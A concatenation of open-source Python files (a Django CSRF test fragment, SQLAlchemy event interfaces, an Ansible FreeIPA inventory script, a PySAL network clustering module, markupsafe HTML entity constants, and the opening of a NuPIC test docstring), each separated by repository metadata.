def test_no_cookies(self):
"""
The CSRF cookie is checked for POST. Failure to send this cookie should
provide a nice error message.
"""
response = self.client.post('/')
self.assertContains(response,
"You are seeing this message because this site "
"requires a CSRF cookie when submitting forms. "
"This cookie is required for security reasons, to "
"ensure that your browser is not being hijacked "
"by third parties.",
status_code=403)
# In Django 1.10, this can be changed to TEMPLATES=[] because the code path
# that reads the TEMPLATE_* settings in that case will have been removed.
@override_settings(TEMPLATES=[{
'BACKEND': 'django.template.backends.dummy.TemplateStrings',
}])
def test_no_django_template_engine(self):
"""
The CSRF view doesn't depend on the TEMPLATES configuration (#24388).
"""
response = self.client.post('/')
self.assertContains(response, "Forbidden", status_code=403)
| bsd-3-clause |
xkcd1253/Mimi | flask/lib/python2.7/site-packages/sqlalchemy/events.py | 18 | 16768 | # sqlalchemy/events.py
# Copyright (C) 2005-2012 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Core event interfaces."""
from sqlalchemy import event, exc, util
engine = util.importlater('sqlalchemy', 'engine')
pool = util.importlater('sqlalchemy', 'pool')
class DDLEvents(event.Events):
"""
Define event listeners for schema objects,
that is, :class:`.SchemaItem` and :class:`.SchemaEvent`
subclasses, including :class:`.MetaData`, :class:`.Table`,
:class:`.Column`.
:class:`.MetaData` and :class:`.Table` support events
specifically regarding when CREATE and DROP
DDL is emitted to the database.
Attachment events are also provided to customize
behavior whenever a child schema element is associated
with a parent, such as, when a :class:`.Column` is associated
with its :class:`.Table`, when a :class:`.ForeignKeyConstraint`
is associated with a :class:`.Table`, etc.
Example using the ``after_create`` event::
from sqlalchemy import event
from sqlalchemy import Table, Column, Metadata, Integer
m = MetaData()
some_table = Table('some_table', m, Column('data', Integer))
def after_create(target, connection, **kw):
connection.execute("ALTER TABLE %s SET name=foo_%s" %
(target.name, target.name))
event.listen(some_table, "after_create", after_create)
DDL events integrate closely with the
:class:`.DDL` class and the :class:`.DDLElement` hierarchy
of DDL clause constructs, which are themselves appropriate
as listener callables::
from sqlalchemy import DDL
event.listen(
some_table,
"after_create",
DDL("ALTER TABLE %(table)s SET name=foo_%(table)s")
)
The methods here define the name of an event as well
as the names of members that are passed to listener
functions.
See also:
:ref:`event_toplevel`
:class:`.DDLElement`
:class:`.DDL`
:ref:`schema_ddl_sequences`
"""
def before_create(self, target, connection, **kw):
"""Called before CREATE statments are emitted.
:param target: the :class:`.MetaData` or :class:`.Table`
object which is the target of the event.
:param connection: the :class:`.Connection` where the
CREATE statement or statements will be emitted.
:param \**kw: additional keyword arguments relevant
to the event. The contents of this dictionary
may vary across releases, and include the
list of tables being generated for a metadata-level
event, the checkfirst flag, and other
elements used by internal events.
"""
def after_create(self, target, connection, **kw):
"""Called after CREATE statments are emitted.
:param target: the :class:`.MetaData` or :class:`.Table`
object which is the target of the event.
:param connection: the :class:`.Connection` where the
CREATE statement or statements have been emitted.
:param \**kw: additional keyword arguments relevant
to the event. The contents of this dictionary
may vary across releases, and include the
list of tables being generated for a metadata-level
event, the checkfirst flag, and other
elements used by internal events.
"""
def before_drop(self, target, connection, **kw):
"""Called before DROP statments are emitted.
:param target: the :class:`.MetaData` or :class:`.Table`
object which is the target of the event.
:param connection: the :class:`.Connection` where the
DROP statement or statements will be emitted.
:param \**kw: additional keyword arguments relevant
to the event. The contents of this dictionary
may vary across releases, and include the
list of tables being generated for a metadata-level
event, the checkfirst flag, and other
elements used by internal events.
"""
def after_drop(self, target, connection, **kw):
"""Called after DROP statments are emitted.
:param target: the :class:`.MetaData` or :class:`.Table`
object which is the target of the event.
:param connection: the :class:`.Connection` where the
DROP statement or statements have been emitted.
:param \**kw: additional keyword arguments relevant
to the event. The contents of this dictionary
may vary across releases, and include the
list of tables being generated for a metadata-level
event, the checkfirst flag, and other
elements used by internal events.
"""
def before_parent_attach(self, target, parent):
"""Called before a :class:`.SchemaItem` is associated with
a parent :class:`.SchemaItem`.
:param target: the target object
:param parent: the parent to which the target is being attached.
:func:`.event.listen` also accepts a modifier for this event:
:param propagate=False: When True, the listener function will
be established for any copies made of the target object,
i.e. those copies that are generated when
:meth:`.Table.tometadata` is used.
"""
def after_parent_attach(self, target, parent):
"""Called after a :class:`.SchemaItem` is associated with
a parent :class:`.SchemaItem`.
:param target: the target object
:param parent: the parent to which the target is being attached.
:func:`.event.listen` also accepts a modifier for this event:
:param propagate=False: When True, the listener function will
be established for any copies made of the target object,
i.e. those copies that are generated when
:meth:`.Table.tometadata` is used.
"""
def column_reflect(self, table, column_info):
"""Called for each unit of 'column info' retrieved when
a :class:`.Table` is being reflected.
The dictionary of column information as returned by the
dialect is passed, and can be modified. The dictionary
is that returned in each element of the list returned
by :meth:`.reflection.Inspector.get_columns`.
The event is called before any action is taken against
this dictionary, and the contents can be modified.
The :class:`.Column` specific arguments ``info``, ``key``,
and ``quote`` can also be added to the dictionary and
will be passed to the constructor of :class:`.Column`.
Note that this event is only meaningful if either
associated with the :class:`.Table` class across the
board, e.g.::
from sqlalchemy.schema import Table
from sqlalchemy import event
def listen_for_reflect(table, column_info):
"receive a column_reflect event"
# ...
event.listen(
Table,
'column_reflect',
listen_for_reflect)
...or with a specific :class:`.Table` instance using
the ``listeners`` argument::
def listen_for_reflect(table, column_info):
"receive a column_reflect event"
# ...
t = Table(
'sometable',
autoload=True,
listeners=[
('column_reflect', listen_for_reflect)
])
This because the reflection process initiated by ``autoload=True``
completes within the scope of the constructor for :class:`.Table`.
"""
class SchemaEventTarget(object):
"""Base class for elements that are the targets of :class:`.DDLEvents` events.
This includes :class:`.SchemaItem` as well as :class:`.SchemaType`.
"""
dispatch = event.dispatcher(DDLEvents)
def _set_parent(self, parent):
"""Associate with this SchemaEvent's parent object."""
raise NotImplementedError()
def _set_parent_with_dispatch(self, parent):
self.dispatch.before_parent_attach(self, parent)
self._set_parent(parent)
self.dispatch.after_parent_attach(self, parent)
class PoolEvents(event.Events):
"""Available events for :class:`.Pool`.
The methods here define the name of an event as well
as the names of members that are passed to listener
functions.
e.g.::
from sqlalchemy import event
def my_on_checkout(dbapi_conn, connection_rec, connection_proxy):
"handle an on checkout event"
event.listen(Pool, 'checkout', my_on_checkout)
In addition to accepting the :class:`.Pool` class and :class:`.Pool` instances,
:class:`.PoolEvents` also accepts :class:`.Engine` objects and
the :class:`.Engine` class as targets, which will be resolved
to the ``.pool`` attribute of the given engine or the :class:`.Pool`
class::
engine = create_engine("postgresql://scott:tiger@localhost/test")
# will associate with engine.pool
event.listen(engine, 'checkout', my_on_checkout)
"""
@classmethod
def _accept_with(cls, target):
if isinstance(target, type):
if issubclass(target, engine.Engine):
return pool.Pool
elif issubclass(target, pool.Pool):
return target
elif isinstance(target, engine.Engine):
return target.pool
else:
return target
def connect(self, dbapi_connection, connection_record):
"""Called once for each new DB-API connection or Pool's ``creator()``.
:param dbapi_con:
A newly connected raw DB-API connection (not a SQLAlchemy
``Connection`` wrapper).
:param con_record:
The ``_ConnectionRecord`` that persistently manages the connection
"""
def first_connect(self, dbapi_connection, connection_record):
"""Called exactly once for the first DB-API connection.
:param dbapi_con:
A newly connected raw DB-API connection (not a SQLAlchemy
``Connection`` wrapper).
:param con_record:
The ``_ConnectionRecord`` that persistently manages the connection
"""
def checkout(self, dbapi_connection, connection_record, connection_proxy):
"""Called when a connection is retrieved from the Pool.
:param dbapi_con:
A raw DB-API connection
:param con_record:
The ``_ConnectionRecord`` that persistently manages the connection
:param con_proxy:
The ``_ConnectionFairy`` which manages the connection for the span of
the current checkout.
If you raise a :class:`~sqlalchemy.exc.DisconnectionError`, the current
connection will be disposed and a fresh connection retrieved.
Processing of all checkout listeners will abort and restart
using the new connection.
"""
def checkin(self, dbapi_connection, connection_record):
"""Called when a connection returns to the pool.
Note that the connection may be closed, and may be None if the
connection has been invalidated. ``checkin`` will not be called
for detached connections. (They do not return to the pool.)
:param dbapi_con:
A raw DB-API connection
:param con_record:
The ``_ConnectionRecord`` that persistently manages the connection
"""
class ConnectionEvents(event.Events):
"""Available events for :class:`.Connection`.
The methods here define the name of an event as well as the names of members that are passed to listener functions.
e.g.::
from sqlalchemy import event, create_engine
def before_execute(conn, clauseelement, multiparams, params):
log.info("Received statement: %s" % clauseelement)
engine = create_engine('postgresql://scott:tiger@localhost/test')
event.listen(engine, "before_execute", before_execute)
Some events allow modifiers to the listen() function.
:param retval=False: Applies to the :meth:`.before_execute` and
:meth:`.before_cursor_execute` events only. When True, the
user-defined event function must have a return value, which
is a tuple of parameters that replace the given statement
and parameters. See those methods for a description of
specific return arguments.
"""
@classmethod
def _listen(cls, target, identifier, fn, retval=False):
target._has_events = True
if not retval:
if identifier == 'before_execute':
orig_fn = fn
def wrap(conn, clauseelement, multiparams, params):
orig_fn(conn, clauseelement, multiparams, params)
return clauseelement, multiparams, params
fn = wrap
elif identifier == 'before_cursor_execute':
orig_fn = fn
def wrap(conn, cursor, statement,
parameters, context, executemany):
orig_fn(conn, cursor, statement,
parameters, context, executemany)
return statement, parameters
fn = wrap
elif retval and identifier not in ('before_execute', 'before_cursor_execute'):
raise exc.ArgumentError(
"Only the 'before_execute' and "
"'before_cursor_execute' engine "
"event listeners accept the 'retval=True' "
"argument.")
event.Events._listen(target, identifier, fn)
def before_execute(self, conn, clauseelement, multiparams, params):
"""Intercept high level execute() events."""
def after_execute(self, conn, clauseelement, multiparams, params, result):
"""Intercept high level execute() events."""
def before_cursor_execute(self, conn, cursor, statement,
parameters, context, executemany):
"""Intercept low-level cursor execute() events."""
def after_cursor_execute(self, conn, cursor, statement,
parameters, context, executemany):
"""Intercept low-level cursor execute() events."""
def dbapi_error(self, conn, cursor, statement, parameters,
context, exception):
"""Intercept a raw DBAPI error.
This event is called with the DBAPI exception instance
received from the DBAPI itself, *before* SQLAlchemy wraps the
exception with it's own exception wrappers, and before any
other operations are performed on the DBAPI cursor; the
existing transaction remains in effect as well as any state
on the cursor.
The use case here is to inject low-level exception handling
into an :class:`.Engine`, typically for logging and
debugging purposes. In general, user code should **not** modify
any state or throw any exceptions here as this will
interfere with SQLAlchemy's cleanup and error handling
routines.
Subsequent to this hook, SQLAlchemy may attempt any
number of operations on the connection/cursor, including
closing the cursor, rolling back of the transaction in the
case of connectionless execution, and disposing of the entire
connection pool if a "disconnect" was detected. The
exception is then wrapped in a SQLAlchemy DBAPI exception
wrapper and re-thrown.
.. versionadded:: 0.7.7
"""
def begin(self, conn):
"""Intercept begin() events."""
def rollback(self, conn):
"""Intercept rollback() events."""
def commit(self, conn):
"""Intercept commit() events."""
def savepoint(self, conn, name=None):
"""Intercept savepoint() events."""
def rollback_savepoint(self, conn, name, context):
"""Intercept rollback_savepoint() events."""
def release_savepoint(self, conn, name, context):
"""Intercept release_savepoint() events."""
def begin_twophase(self, conn, xid):
"""Intercept begin_twophase() events."""
def prepare_twophase(self, conn, xid):
"""Intercept prepare_twophase() events."""
def rollback_twophase(self, conn, xid, is_prepared):
"""Intercept rollback_twophase() events."""
def commit_twophase(self, conn, xid, is_prepared):
"""Intercept commit_twophase() events."""
| gpl-2.0 |
shepdelacreme/ansible | contrib/inventory/freeipa.py | 67 | 3992 | #!/usr/bin/env python
# Copyright (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
import argparse
from distutils.version import LooseVersion
import json
import os
import sys
from ipalib import api, errors, __version__ as IPA_VERSION
from six import u
def initialize():
'''
This function initializes the FreeIPA/IPA API. This function requires
no arguments. A kerberos key must be present in the users keyring in
order for this to work. IPA default configuration directory is /etc/ipa,
this path could be overridden with IPA_CONFDIR environment variable.
'''
api.bootstrap(context='cli')
if not os.path.isdir(api.env.confdir):
print("WARNING: IPA configuration directory (%s) is missing. "
"Environment variable IPA_CONFDIR could be used to override "
"default path." % api.env.confdir)
if LooseVersion(IPA_VERSION) >= LooseVersion('4.6.2'):
# With ipalib < 4.6.0 'server' and 'domain' have default values
# ('localhost:8888', 'example.com'), newer versions don't and
# DNS autodiscovery is broken, then one of jsonrpc_uri / xmlrpc_uri is
# required.
# ipalib 4.6.0 is unusable (https://pagure.io/freeipa/issue/7132)
# that's why 4.6.2 is explicitely tested.
if 'server' not in api.env or 'domain' not in api.env:
sys.exit("ERROR: ('jsonrpc_uri' or 'xmlrpc_uri') or 'domain' are not "
"defined in '[global]' section of '%s' nor in '%s'." %
(api.env.conf, api.env.conf_default))
api.finalize()
try:
api.Backend.rpcclient.connect()
except AttributeError:
# FreeIPA < 4.0 compatibility
api.Backend.xmlclient.connect()
return api
def list_groups(api):
'''
This function prints a list of all host groups. This function requires
one argument, the FreeIPA/IPA API object.
'''
inventory = {}
hostvars = {}
result = api.Command.hostgroup_find(all=True)['result']
for hostgroup in result:
# Get direct and indirect members (nested hostgroups) of hostgroup
members = []
if 'member_host' in hostgroup:
members = [host for host in hostgroup['member_host']]
if 'memberindirect_host' in hostgroup:
members += (host for host in hostgroup['memberindirect_host'])
inventory[hostgroup['cn'][0]] = {'hosts': [host for host in members]}
for member in members:
hostvars[member] = {}
inventory['_meta'] = {'hostvars': hostvars}
inv_string = json.dumps(inventory, indent=1, sort_keys=True)
print(inv_string)
return None
def parse_args():
'''
This function parses the arguments that were passed in via the command line.
This function expects no arguments.
'''
parser = argparse.ArgumentParser(description='Ansible FreeIPA/IPA '
'inventory module')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('--list', action='store_true',
help='List active servers')
group.add_argument('--host', help='List details about the specified host')
return parser.parse_args()
def get_host_attributes(api, host):
"""
This function expects one string, this hostname to lookup variables for.
Args:
api: FreeIPA API Object
host: Name of Hostname
Returns: Dict of Host vars if found else None
"""
try:
result = api.Command.host_show(u(host))['result']
if 'usercertificate' in result:
del result['usercertificate']
return json.dumps(result, indent=1)
except errors.NotFound as e:
return {}
if __name__ == '__main__':
args = parse_args()
api = initialize()
if args.host:
print(get_host_attributes(api, args.host))
elif args.list:
list_groups(api)
| gpl-3.0 |
AlanZatarain/pysal | pysal/contrib/network/lincs.py | 15 | 13081 | #!/usr/bin/env python
"""
A library for computing local indicators of network-constrained clusters
Author:
Myunghwa Hwang mhwang4@gmail.com
"""
import unittest
import numpy as np
import scipy.stats as stats
import geodanet.network as pynet
import pysal, copy
import time
def unconditional_sim(event, base, s):
"""
Parameters:
event: n*1 numpy array with integer values
observed values for an event variable
base: n*1 numpy array with integer values
observed values for a population variable
s: integer
the number of simulations
Returns:
: n*s numpy array
"""
mean_risk = event.sum()*1.0/base.sum()
if base.dtype != int:
base = np.array([int(v) for v in base])
base_zeros = (base == 0.0)
base[base_zeros] += 1.0
sims = np.random.binomial(base, mean_risk, (s, len(event))).transpose()
sims[base_zeros, :] = 0.0
return sims
def unconditional_sim_poisson(event, base, s):
"""
Parameters:
event: n*1 numpy array with integer values
observed values for an event variable
base: n*1 numpy array with integer values
observed values for a population variable
s: integer
the number of simulations
Returns:
: n*s numpy array
"""
mean_risk = event.sum()*1.0/base.sum()
E = base*mean_risk
return np.random.poisson(E, (s, len(event))).transpose()
def conditional_multinomial(event, base, s):
"""
Parameters:
event: n*1 numpy array with integer values
observed values for an event variable
base: n*1 numpy array with integer values
observed values for a population variable
s: integer
the number of simulations
Returns:
: n*s numpy array
"""
m = int(event.sum())
props = base*1.0/base.sum()
return np.random.multinomial(m, props, s).transpose()
def pseudo_pvalues(obs, sims):
"""
Get pseudo p-values from a set of observed indices and their simulated ones.
Parameters:
obs: n*1 numpy array for observed values
sims: n*sims numpy array; sims is the number of simulations
Returns:
p_sim : n*1 numpy array for pseudo p-values
E_sim : mean of p_sim
SE_sim: standard deviation of p_sim
V_sim: variance of p_sim
z_sim: standardarized observed values
p_z_sim: p-value of z_sim based on normal distribution
"""
sims = np.transpose(sims)
permutations = sims.shape[0]
above = sims >= obs
larger = sum(above)
low_extreme = (permutations - larger) < larger
larger[low_extreme] = permutations - larger[low_extreme]
p_sim = (larger + 1.0)/(permutations + 1.0)
E_sim = sims.mean()
SE_sim = sims.std()
V_sim = SE_sim*SE_sim
z_sim = (obs - E_sim)/SE_sim
p_z_sim = 1 - stats.norm.cdf(np.abs(z_sim))
return p_sim, E_sim, SE_sim, V_sim, z_sim, p_z_sim
def node_weights(network, attribute=False):
"""
Obtains a spatial weights matrix of edges in a network
if two edges share a node, they are neighbors
Parameters:
network: a network with/without attributes
attribute: boolean
if true, attributes of edges are added to a dictionary of edges,
which is a return value
Returns:
w: a spatial weights instance
id2link: an associative dictionary that connects a sequential id to a unique
edge on the network
if attribute is true, each item in the dictionary includes the attributes
"""
link2id, id2link = {}, {}
counter = 0
neighbors, weights = {},{}
for n1 in network:
for n2 in network[n1]:
if (n1,n2) not in link2id or link2id[(n1,n2)] not in neighbors:
if (n1,n2) not in link2id:
link2id[(n1,n2)] = counter
link2id[(n2,n1)] = counter
if not attribute:
id2link[counter] = (n1, n2)
else:
id2link[counter] = tuple([(n1,n2)] + list(network[n1][n2][1:]))
counter += 1
neighbors_from_n1 = [(n1, n) for n in network[n1] if n != n2]
neighbors_from_n2 = [(n2, n) for n in network[n2] if n != n1]
neighbors_all = neighbors_from_n1 + neighbors_from_n2
neighbor_ids = []
for edge in neighbors_all:
if edge not in link2id:
link2id[edge] = counter
link2id[(edge[-1], edge[0])] = counter
if not attribute:
id2link[counter] = edge
else:
id2link[counter] = tuple([edge] + list(network[edge[0]][edge[1]][1:]))
neighbor_ids.append(counter)
counter += 1
else:
neighbor_ids.append(link2id[edge])
neighbors[link2id[(n1,n2)]] = neighbor_ids
weights[link2id[(n1,n2)]] = [1.0]*(len(neighbors_from_n1) + len(neighbors_from_n2))
return pysal.weights.W(neighbors, weights), id2link
def edgepoints_from_network(network, attribute=False):
"""
Obtains a list of projected points which are midpoints of edges
Parameters:
network: a network with/without attributes
attribute: boolean
if true, one of return values includes attributes for each edge
Returns:
id2linkpoints: a dictionary that associates a sequential id to a projected, midpoint of each edge
id2attr: a dictionary that associates a sequential id to the attributes of each edge
link2id: a dictionary that associates each edge to its id
"""
link2id, id2linkpoints, id2attr = {}, {}, {}
counter = 0
for n1 in network:
for n2 in network[n1]:
if (n1,n2) not in link2id or (n2,n1) not in link2id:
link2id[(n1,n2)] = counter
link2id[(n2,n1)] = counter
if type(network[n1][n2]) != list:
half_dist = network[n1][n2]/2
else:
half_dist = network[n1][n2][0]/2
if n1[0] < n2[0] or (n1[0] == n2[0] and n1[1] < n2[1]):
id2linkpoints[counter] = (n1,n2,half_dist,half_dist)
else:
id2linkpoints[counter] = (n2,n1,half_dist,half_dist)
if attribute:
id2attr[counter] = network[n1][n2][1:]
counter += 1
return id2linkpoints, id2attr, link2id
def dist_weights(network, id2linkpoints, link2id, bandwidth):
"""
Obtains a distance-based spatial weights matrix using network distance
Parameters:
network: an undirected network without additional attributes
id2linkpoints: a dictionary that includes a list of network-projected, midpoints of edges in the network
link2id: a dictionary that associates each edge to a unique id
bandwidth: a threshold distance for creating a spatial weights matrix
Returns:
w : a distance-based, binary spatial weights matrix
id2link: a dictionary that associates a unique id to each edge of the network
"""
linkpoints = id2linkpoints.values()
neighbors, id2link = {}, {}
net_distances = {}
for linkpoint in id2linkpoints:
if linkpoints[linkpoint] not in net_distances:
net_distances[linkpoints[linkpoint][0]] = pynet.dijkstras(network, linkpoints[linkpoint][0], r=bandwidth)
net_distances[linkpoints[linkpoint][1]] = pynet.dijkstras(network, linkpoints[linkpoint][1], r=bandwidth)
ngh = pynet.proj_distances_undirected(network, linkpoints[linkpoint], linkpoints, r=bandwidth, cache=net_distances)
#ngh = pynet.proj_distances_undirected(network, linkpoints[linkpoint], linkpoints, r=bandwidth)
if linkpoints[linkpoint] in ngh:
del ngh[linkpoints[linkpoint]]
if linkpoint not in neighbors:
neighbors[linkpoint] = []
for k in ngh.keys():
neighbor = link2id[k[:2]]
if neighbor not in neighbors[linkpoint]:
neighbors[linkpoint].append(neighbor)
if neighbor not in neighbors:
neighbors[neighbor] = []
if linkpoint not in neighbors[neighbor]:
neighbors[neighbor].append(linkpoint)
id2link[linkpoint] = id2linkpoints[linkpoint][:2]
weights = copy.copy(neighbors)
for ngh in weights:
weights[ngh] = [1.0]*len(weights[ngh])
return pysal.weights.W(neighbors, weights), id2link
def lincs(network, event, base, weight, dist=None, lisa_func='moran', sim_method="permutations", sim_num=99):
"""
Compute local Moran's I for edges in the network
Parameters:
network: a clean network where each edge has up to three attributes:
Its length, an event variable, and a base variable
event: integer
an index for the event variable
base: integer
an index for the base variable
weight: string
type of binary spatial weights
two options are allowed: Node-based, Distance-based
dist: float
threshold distance value for the distance-based weight
lisa_func: string
type of LISA functions
three options allowed: moran, g, and g_star
sim_method: string
type of simulation methods
four options allowed: permutations, binomial (unconditional),
poisson (unconditional), multinomial (conditional)
sim_num: integer
the number of simulations
Returns:
: a dictionary of edges
an edge and its moran's I are the key and item
: a Weights object
PySAL spatial weights object
"""
if lisa_func in ['g', 'g_star'] and weight == 'Node-based':
print 'Local G statistics can work only with distance-based weights matrix'
raise
if lisa_func == 'moran':
lisa_func = pysal.esda.moran.Moran_Local
else:
lisa_func = pysal.esda.getisord.G_Local
star = False
if lisa_func == 'g_star':
star = True
if base:
def getBase(edges, edge, base):
return edges[edge][base]
else:
def getBase(edges, edge, base):
return 1.0
w, edges, e, b, edges_geom = None, None, None, None, []
if weight == 'Node-based':
w, edges = node_weights(network, attribute=True)
n = len(edges)
e, b = np.zeros(n), np.zeros(n)
for edge in edges:
edges_geom.append(edges[edge][0])
e[edge] = edges[edge][event]
b[edge] = getBase(edges, edge, base)
w.id_order = edges.keys()
elif dist is not None:
id2edgepoints, id2attr, edge2id = edgepoints_from_network(network, attribute=True)
for n1 in network:
for n2 in network[n1]:
network[n1][n2] = network[n1][n2][0]
w, edges = dist_weights(network, id2edgepoints, edge2id, dist)
n = len(id2attr)
e, b = np.zeros(n), np.zeros(n)
if base:
base -= 1
for edge in id2attr:
edges_geom.append(edges[edge])
e[edge] = id2attr[edge][event - 1]
b[edge] = getBase(id2attr, edge, base)
w.id_order = id2attr.keys()
Is, p_sim, Zs = None,None, None
if sim_method == 'permutation':
if lisa_func == pysal.esda.moran.Moran_Local:
lisa_i = lisa_func(e*1.0/b,w,transformation="r",permutations=sim_num)
Is = lisa_i.Is
Zs = lisa_i.q
else:
lisa_i = lisa_func(e*1.0/b,w,transform="R",permutations=sim_num,star=star)
Is = lisa_i.Gs
Zs = lisa_i.Zs
p_sim = lisa_i.p_sim
else:
sims = None
if lisa_func == pysal.esda.moran.Moran_Local:
lisa_i = lisa_func(e*1.0/b,w,transformation="r",permutations=0)
Is = lisa_i.Is
Zs = lisa_i.q
else:
lisa_i = lisa_func(e*1.0/b,w,transform="R",permutations=0,star=star)
Is = lisa_i.Gs
Zs = lisa_i.Zs
if sim_method == 'binomial':
sims = unconditional_sim(e, b, sim_num)
elif sim_method == 'poisson':
sims = unconditional_sim_poisson(e, b, sim_num)
else:
sims = conditional_multinomial(e, b, sim_num)
if lisa_func == pysal.esda.moran.Moran_Local:
for i in range(sim_num):
sims[:,i] = lisa_func(sims[:,i]*1.0/b,w,transformation="r",permutations=0).Is
else:
for i in range(sim_num):
sims[:,i] = lisa_func(sims[:,i]*1.0/b,w,permutations=0,star=star).Gs
sim_res = pseudo_pvalues(Is, sims)
p_sim = sim_res[0]
w.transform = 'O'
return zip(edges_geom, e, b, Is, Zs, p_sim), w
| bsd-3-clause |
andrewleech/SickRage | lib/markupsafe/_constants.py | 1535 | 4795 | # -*- coding: utf-8 -*-
"""
markupsafe._constants
~~~~~~~~~~~~~~~~~~~~~
Highlevel implementation of the Markup string.
:copyright: (c) 2010 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
HTML_ENTITIES = {
'AElig': 198,
'Aacute': 193,
'Acirc': 194,
'Agrave': 192,
'Alpha': 913,
'Aring': 197,
'Atilde': 195,
'Auml': 196,
'Beta': 914,
'Ccedil': 199,
'Chi': 935,
'Dagger': 8225,
'Delta': 916,
'ETH': 208,
'Eacute': 201,
'Ecirc': 202,
'Egrave': 200,
'Epsilon': 917,
'Eta': 919,
'Euml': 203,
'Gamma': 915,
'Iacute': 205,
'Icirc': 206,
'Igrave': 204,
'Iota': 921,
'Iuml': 207,
'Kappa': 922,
'Lambda': 923,
'Mu': 924,
'Ntilde': 209,
'Nu': 925,
'OElig': 338,
'Oacute': 211,
'Ocirc': 212,
'Ograve': 210,
'Omega': 937,
'Omicron': 927,
'Oslash': 216,
'Otilde': 213,
'Ouml': 214,
'Phi': 934,
'Pi': 928,
'Prime': 8243,
'Psi': 936,
'Rho': 929,
'Scaron': 352,
'Sigma': 931,
'THORN': 222,
'Tau': 932,
'Theta': 920,
'Uacute': 218,
'Ucirc': 219,
'Ugrave': 217,
'Upsilon': 933,
'Uuml': 220,
'Xi': 926,
'Yacute': 221,
'Yuml': 376,
'Zeta': 918,
'aacute': 225,
'acirc': 226,
'acute': 180,
'aelig': 230,
'agrave': 224,
'alefsym': 8501,
'alpha': 945,
'amp': 38,
'and': 8743,
'ang': 8736,
'apos': 39,
'aring': 229,
'asymp': 8776,
'atilde': 227,
'auml': 228,
'bdquo': 8222,
'beta': 946,
'brvbar': 166,
'bull': 8226,
'cap': 8745,
'ccedil': 231,
'cedil': 184,
'cent': 162,
'chi': 967,
'circ': 710,
'clubs': 9827,
'cong': 8773,
'copy': 169,
'crarr': 8629,
'cup': 8746,
'curren': 164,
'dArr': 8659,
'dagger': 8224,
'darr': 8595,
'deg': 176,
'delta': 948,
'diams': 9830,
'divide': 247,
'eacute': 233,
'ecirc': 234,
'egrave': 232,
'empty': 8709,
'emsp': 8195,
'ensp': 8194,
'epsilon': 949,
'equiv': 8801,
'eta': 951,
'eth': 240,
'euml': 235,
'euro': 8364,
'exist': 8707,
'fnof': 402,
'forall': 8704,
'frac12': 189,
'frac14': 188,
'frac34': 190,
'frasl': 8260,
'gamma': 947,
'ge': 8805,
'gt': 62,
'hArr': 8660,
'harr': 8596,
'hearts': 9829,
'hellip': 8230,
'iacute': 237,
'icirc': 238,
'iexcl': 161,
'igrave': 236,
'image': 8465,
'infin': 8734,
'int': 8747,
'iota': 953,
'iquest': 191,
'isin': 8712,
'iuml': 239,
'kappa': 954,
'lArr': 8656,
'lambda': 955,
'lang': 9001,
'laquo': 171,
'larr': 8592,
'lceil': 8968,
'ldquo': 8220,
'le': 8804,
'lfloor': 8970,
'lowast': 8727,
'loz': 9674,
'lrm': 8206,
'lsaquo': 8249,
'lsquo': 8216,
'lt': 60,
'macr': 175,
'mdash': 8212,
'micro': 181,
'middot': 183,
'minus': 8722,
'mu': 956,
'nabla': 8711,
'nbsp': 160,
'ndash': 8211,
'ne': 8800,
'ni': 8715,
'not': 172,
'notin': 8713,
'nsub': 8836,
'ntilde': 241,
'nu': 957,
'oacute': 243,
'ocirc': 244,
'oelig': 339,
'ograve': 242,
'oline': 8254,
'omega': 969,
'omicron': 959,
'oplus': 8853,
'or': 8744,
'ordf': 170,
'ordm': 186,
'oslash': 248,
'otilde': 245,
'otimes': 8855,
'ouml': 246,
'para': 182,
'part': 8706,
'permil': 8240,
'perp': 8869,
'phi': 966,
'pi': 960,
'piv': 982,
'plusmn': 177,
'pound': 163,
'prime': 8242,
'prod': 8719,
'prop': 8733,
'psi': 968,
'quot': 34,
'rArr': 8658,
'radic': 8730,
'rang': 9002,
'raquo': 187,
'rarr': 8594,
'rceil': 8969,
'rdquo': 8221,
'real': 8476,
'reg': 174,
'rfloor': 8971,
'rho': 961,
'rlm': 8207,
'rsaquo': 8250,
'rsquo': 8217,
'sbquo': 8218,
'scaron': 353,
'sdot': 8901,
'sect': 167,
'shy': 173,
'sigma': 963,
'sigmaf': 962,
'sim': 8764,
'spades': 9824,
'sub': 8834,
'sube': 8838,
'sum': 8721,
'sup': 8835,
'sup1': 185,
'sup2': 178,
'sup3': 179,
'supe': 8839,
'szlig': 223,
'tau': 964,
'there4': 8756,
'theta': 952,
'thetasym': 977,
'thinsp': 8201,
'thorn': 254,
'tilde': 732,
'times': 215,
'trade': 8482,
'uArr': 8657,
'uacute': 250,
'uarr': 8593,
'ucirc': 251,
'ugrave': 249,
'uml': 168,
'upsih': 978,
'upsilon': 965,
'uuml': 252,
'weierp': 8472,
'xi': 958,
'yacute': 253,
'yen': 165,
'yuml': 255,
'zeta': 950,
'zwj': 8205,
'zwnj': 8204
}
| gpl-3.0 |
jkthompson/nupic | examples/tp/tp_test.py | 9 | 90129 | #!/usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""
This file performs a variety of tests on the reference temporal pooler code.
basic_test
==========
Tests creation and serialization of the TP class. Sets parameters and ensures
they are the same after a serialization and de-serialization step. Runs learning
and inference on a small number of random patterns and ensures it doesn't crash.
===============================================================================
Basic First Order Sequences
===============================================================================
These tests ensure the most basic (first order) sequence learning mechanism is
working.
Parameters: Use a "fast learning mode": turn off global decay, temporal pooling
and hilo (make minThreshold really high). initPerm should be greater than
connectedPerm and permanenceDec should be zero. With these settings sequences
should be learned in one pass:
minThreshold = newSynapseCount
globalDecay = 0
temporalPooling = False
